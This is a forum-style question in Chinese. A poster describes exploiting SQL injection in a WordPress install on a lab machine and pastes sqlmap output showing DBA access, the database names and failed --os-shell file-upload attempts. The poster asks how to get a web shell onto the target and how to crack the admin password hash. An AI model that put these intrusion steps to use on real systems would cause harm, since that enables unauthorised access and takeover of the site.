我在我的一台实验室机器内的 Wordpress 安装中发现了一个SQL 注入漏洞,我正试图利用它来上传一个 shell。
我可以得到管理员哈希,但它似乎很复杂,因为 JTR 和 HASHCAT 需要很长时间而没有运气。
这是 SQLmap 的基本输出:
web server operating system: Linux Ubuntu xxxxxxxxx
web application technology: PHP 5.2.6, Apache 2.2.11
back-end DBMS: MySQL 5
[02:24:38] [INFO] testing if current user is DBA
[02:24:38] [INFO] fetching current user
current user is DBA: True
[02:24:38] [INFO] fetching database names
[02:24:38] [INFO] the SQL query used returns 3 entries
[02:24:38] [INFO] resumed: "information_schema","information_schema"
[02:24:38] [INFO] resumed: "mysql","mysql"
[02:24:38] [INFO] resumed: "wordpress","wordpress"
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress
我尝试--os-shell
了选项,但似乎没有写入权限,因为我收到以下错误:
[02:26:36] [警告] 无法自动检索任何 Web 服务器路径
[02:26:36] [INFO] 尝试通过 LIMIT INTO OUTFILE 技术在“/var/www”上上传文件暂存器
[02:26:37] [警告] 无法在“/var/www”上上传文件暂存器
[02:26:37] [INFO] 尝试通过 UNION 技术在“/var/www”上上传文件暂存器
[02:26:37] [警告] 预计文件中的垃圾字符是 UNION 查询的剩余部分
[02:26:38] [警告] 看起来文件尚未写入,如果 DBMS 进程的用户在目标路径中没有写入权限,则可能会发生这种情况
我可以毫无问题地获得 --sql-shell 。我尝试了此处的步骤(http://evilzone.org/tutorials/upload-shell-with-sql-injection/)上传外壳,但出现以下错误
[02:00:16] [警告] 自定义 SQL 查询的执行仅在支持堆叠查询时可用
现在,我需要一种将 shell 上传到目标机器的方法,有什么想法吗?还有什么想法可以在线破解 Wordpress 管理员密码哈希?